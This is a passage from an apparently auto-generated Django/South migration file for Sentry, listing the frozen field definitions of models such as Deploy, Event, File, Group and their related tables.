'organization_name': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'organization_slug': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True'}),
'platform': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'reason': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True'})
},
'sentry.deletedteam': {
'Meta': {'unique_together': '()', 'object_name': 'DeletedTeam', 'index_together': '()'},
'actor_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'null': 'True'}),
'actor_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}),
'actor_label': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'date_created': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'date_deleted': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ip_address': ('django.db.models.fields.GenericIPAddressField', [], {'max_length': '39', 'null': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'organization_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'null': 'True'}),
'organization_name': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'organization_slug': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True'}),
'reason': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True'})
},
'sentry.deploy': {
'Meta': {'unique_together': '()', 'object_name': 'Deploy', 'index_together': '()'},
'date_finished': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'date_started': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'environment_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'}),
'notified': ('django.db.models.fields.NullBooleanField', [], {'default': 'False', 'null': 'True', 'db_index': 'True', 'blank': 'True'}),
'organization_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'release': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Release']"}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'})
},
'sentry.discoversavedquery': {
'Meta': {'unique_together': '()', 'object_name': 'DiscoverSavedQuery', 'index_together': '()'},
'created_by': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']", 'null': 'True', 'on_delete': 'models.SET_NULL'}),
'date_created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'date_updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"}),
'projects': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['sentry.Project']", 'through': "orm['sentry.DiscoverSavedQueryProject']", 'symmetrical': 'False'}),
'query': ('sentry.db.models.fields.jsonfield.JSONField', [], {'default': '{}'})
},
'sentry.discoversavedqueryproject': {
'Meta': {'unique_together': "(('project', 'discover_saved_query'),)", 'object_name': 'DiscoverSavedQueryProject', 'index_together': '()'},
'discover_saved_query': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.DiscoverSavedQuery']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"})
},
'sentry.distribution': {
'Meta': {'unique_together': "(('release', 'name'),)", 'object_name': 'Distribution', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'organization_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'release': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Release']"})
},
'sentry.email': {
'Meta': {'unique_together': '()', 'object_name': 'Email', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('sentry.db.models.fields.citext.CIEmailField', [], {'unique': 'True', 'max_length': '75'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'})
},
'sentry.environment': {
'Meta': {'unique_together': "(('organization_id', 'name'),)", 'object_name': 'Environment', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'organization_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'project_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'projects': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['sentry.Project']", 'through': "orm['sentry.EnvironmentProject']", 'symmetrical': 'False'})
},
'sentry.environmentproject': {
'Meta': {'unique_together': "(('project', 'environment'),)", 'object_name': 'EnvironmentProject', 'index_together': '()'},
'environment': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Environment']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'is_hidden': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"})
},
'sentry.event': {
'Meta': {'unique_together': "(('project_id', 'event_id'),)", 'object_name': 'Event', 'db_table': "'sentry_message'", 'index_together': "(('group_id', 'datetime'),)"},
'data': ('sentry.db.models.fields.node.NodeField', [], {'null': 'True', 'blank': 'True'}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'event_id': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True', 'db_column': "'message_id'"}),
'group_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'null': 'True', 'blank': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'platform': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'project_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'null': 'True', 'blank': 'True'}),
'time_spent': ('sentry.db.models.fields.bounded.BoundedIntegerField', [], {'null': 'True'})
},
'sentry.eventattachment': {
'Meta': {'unique_together': "(('project_id', 'event_id', 'file'),)", 'object_name': 'EventAttachment', 'index_together': "(('project_id', 'date_added'),)"},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'event_id': ('django.db.models.fields.CharField', [], {'max_length': '32', 'db_index': 'True'}),
'file': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.File']"}),
'group_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'null': 'True', 'db_index': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.TextField', [], {}),
'project_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {})
},
'sentry.eventmapping': {
'Meta': {'unique_together': "(('project_id', 'event_id'),)", 'object_name': 'EventMapping', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'event_id': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'group_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {})
},
'sentry.eventprocessingissue': {
'Meta': {'unique_together': "(('raw_event', 'processing_issue'),)", 'object_name': 'EventProcessingIssue', 'index_together': '()'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'processing_issue': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.ProcessingIssue']"}),
'raw_event': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.RawEvent']"})
},
'sentry.eventtag': {
'Meta': {'unique_together': "(('event_id', 'key_id', 'value_id'),)", 'object_name': 'EventTag', 'index_together': "(('group_id', 'key_id', 'value_id'),)"},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'event_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {}),
'group_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {}),
'project_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {}),
'value_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {})
},
'sentry.eventuser': {
'Meta': {'unique_together': "(('project_id', 'ident'), ('project_id', 'hash'))", 'object_name': 'EventUser', 'index_together': "(('project_id', 'email'), ('project_id', 'username'), ('project_id', 'ip_address'))"},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'null': 'True'}),
'hash': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ident': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True'}),
'ip_address': ('django.db.models.fields.GenericIPAddressField', [], {'max_length': '39', 'null': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True'}),
'project_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True'})
},
'sentry.externalissue': {
'Meta': {'unique_together': "(('organization_id', 'integration_id', 'key'),)", 'object_name': 'ExternalIssue', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'integration_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'metadata': ('sentry.db.models.fields.jsonfield.JSONField', [], {'null': 'True'}),
'organization_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'title': ('django.db.models.fields.TextField', [], {'null': 'True'})
},
'sentry.featureadoption': {
'Meta': {'unique_together': "(('organization', 'feature_id'),)", 'object_name': 'FeatureAdoption', 'index_together': '()'},
'applicable': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'complete': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'data': ('sentry.db.models.fields.jsonfield.JSONField', [], {'default': '{}'}),
'date_completed': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'feature_id': ('django.db.models.fields.PositiveIntegerField', [], {}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"})
},
'sentry.file': {
'Meta': {'unique_together': '()', 'object_name': 'File', 'index_together': '()'},
'blob': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'legacy_blob'", 'null': 'True', 'to': "orm['sentry.FileBlob']"}),
'blobs': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['sentry.FileBlob']", 'through': "orm['sentry.FileBlobIndex']", 'symmetrical': 'False'}),
'checksum': ('django.db.models.fields.CharField', [], {'max_length': '40', 'null': 'True', 'db_index': 'True'}),
'headers': ('sentry.db.models.fields.jsonfield.JSONField', [], {'default': '{}'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.TextField', [], {}),
'path': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'size': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'timestamp': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '64'})
},
'sentry.fileblob': {
'Meta': {'unique_together': '()', 'object_name': 'FileBlob', 'index_together': '()'},
'checksum': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '40'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'path': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'size': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'timestamp': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'})
},
'sentry.fileblobindex': {
'Meta': {'unique_together': "(('file', 'blob', 'offset'),)", 'object_name': 'FileBlobIndex', 'index_together': '()'},
'blob': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.FileBlob']"}),
'file': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.File']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'offset': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {})
},
'sentry.fileblobowner': {
'Meta': {'unique_together': "(('blob', 'organization'),)", 'object_name': 'FileBlobOwner', 'index_together': '()'},
'blob': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.FileBlob']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"})
},
'sentry.group': {
'Meta': {'unique_together': "(('project', 'short_id'),)", 'object_name': 'Group', 'db_table': "'sentry_groupedmessage'", 'index_together': "(('project', 'first_release'),)"},
'active_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'db_index': 'True'}),
'culprit': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'db_column': "'view'", 'blank': 'True'}),
'data': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {'null': 'True', 'blank': 'True'}),
'first_release': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Release']", 'null': 'True', 'on_delete': 'models.PROTECT'}),
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'is_public': ('django.db.models.fields.NullBooleanField', [], {'default': 'False', 'null': 'True', 'blank': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'level': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '40', 'db_index': 'True', 'blank': 'True'}),
'logger': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '64', 'db_index': 'True', 'blank': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'num_comments': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'null': 'True'}),
'platform': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'resolved_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'db_index': 'True'}),
'score': ('sentry.db.models.fields.bounded.BoundedIntegerField', [], {'default': '0'}),
'short_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'null': 'True'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'db_index': 'True'}),
'time_spent_count': ('sentry.db.models.fields.bounded.BoundedIntegerField', [], {'default': '0'}),
'time_spent_total': ('sentry.db.models.fields.bounded.BoundedIntegerField', [], {'default': '0'}),
'times_seen': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '1', 'db_index': 'True'})
},
'sentry.groupassignee': {
'Meta': {'unique_together': '()', 'object_name': 'GroupAssignee', 'db_table': "'sentry_groupasignee'", 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'assignee_set'", 'unique': 'True', 'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'assignee_set'", 'to': "orm['sentry.Project']"}),
'team': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'sentry_assignee_set'", 'null': 'True', 'to': "orm['sentry.Team']"}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'sentry_assignee_set'", 'null': 'True', 'to': "orm['sentry.User']"})
},
'sentry.groupbookmark': {
'Meta': {'unique_together': "(('project', 'user', 'group'),)", 'object_name': 'GroupBookmark', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'bookmark_set'", 'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'bookmark_set'", 'to': "orm['sentry.Project']"}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'sentry_bookmark_set'", 'to': "orm['sentry.User']"})
},
'sentry.groupcommitresolution': {
'Meta': {'unique_together': "(('group_id', 'commit_id'),)", 'object_name': 'GroupCommitResolution', 'index_together': '()'},
'commit_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'group_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'})
},
'sentry.groupemailthread': {
'Meta': {'unique_together': "(('email', 'group'), ('email', 'msgid'))", 'object_name': 'GroupEmailThread', 'index_together': '()'},
'date': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'groupemail_set'", 'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'msgid': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'groupemail_set'", 'to': "orm['sentry.Project']"})
},
'sentry.groupenvironment': {
'Meta': {'unique_together': "(('group', 'environment'),)", 'object_name': 'GroupEnvironment', 'index_together': "(('environment', 'first_release'),)"},
'environment': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Environment']"}),
'first_release': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Release']", 'null': 'True', 'on_delete': 'models.DO_NOTHING'}),
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True', 'db_index': 'True'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'})
},
'sentry.grouphash': {
'Meta': {'unique_together': "(('project', 'hash'),)", 'object_name': 'GroupHash', 'index_together': '()'},
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']", 'null': 'True'}),
'group_tombstone_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True', 'db_index': 'True'}),
'hash': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'state': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'})
},
'sentry.grouplink': {
'Meta': {'unique_together': "(('group_id', 'linked_type', 'linked_id'),)", 'object_name': 'GroupLink', 'index_together': '()'},
'data': ('sentry.db.models.fields.jsonfield.JSONField', [], {'default': '{}'}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'group_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'linked_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {}),
'linked_type': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '1'}),
'project_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'db_index': 'True'}),
'relationship': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '2'})
},
'sentry.groupmeta': {
'Meta': {'unique_together': "(('group', 'key'),)", 'object_name': 'GroupMeta', 'index_together': '()'},
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'value': ('django.db.models.fields.TextField', [], {})
},
'sentry.groupredirect': {
'Meta': {'unique_together': '()', 'object_name': 'GroupRedirect', 'index_together': '()'},
'group_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'db_index': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'previous_group_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'unique': 'True'})
},
'sentry.grouprelease': {
'Meta': {'unique_together': "(('group_id', 'release_id', 'environment'),)", 'object_name': 'GroupRelease', 'index_together': '()'},
'environment': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '64'}),
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'group_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'project_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'release_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'})
},
'sentry.groupresolution': {
'Meta': {'unique_together': '()', 'object_name': 'GroupResolution', 'index_together': '()'},
'actor_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']", 'unique': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'release': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Release']"}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'}),
'type': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'})
},
'sentry.grouprulestatus': {
'Meta': {'unique_together': "(('rule', 'group'),)", 'object_name': 'GroupRuleStatus', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'last_active': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'rule': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Rule']"}),
'status': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'})
},
'sentry.groupseen': {
'Meta': {'unique_together': "(('user', 'group'),)", 'object_name': 'GroupSeen', 'index_together': '()'},
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']", 'db_index': 'False'})
},
'sentry.groupshare': {
'Meta': {'unique_together': '()', 'object_name': 'GroupShare', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']", 'unique': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']", 'null': 'True'}),
'uuid': ('django.db.models.fields.CharField', [], {'default': "'993f599bf9114fe1b88e46386a3514da'", 'unique': 'True', 'max_length': '32'})
},
'sentry.groupsnooze': {
'Meta': {'unique_together': '()', 'object_name': 'GroupSnooze', 'index_together': '()'},
'actor_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'count': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']", 'unique': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'state': ('sentry.db.models.fields.jsonfield.JSONField', [], {'null': 'True'}),
'until': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'user_count': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'user_window': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'window': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'})
},
'sentry.groupsubscription': {
'Meta': {'unique_together': "(('group', 'user'),)", 'object_name': 'GroupSubscription', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'subscription_set'", 'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'subscription_set'", 'to': "orm['sentry.Project']"}),
'reason': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"})
},
'sentry.grouptagkey': {
'Meta': {'unique_together': "(('project_id', 'group_id', 'key'),)", 'object_name': 'GroupTagKey', 'index_together': '()'},
'group_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
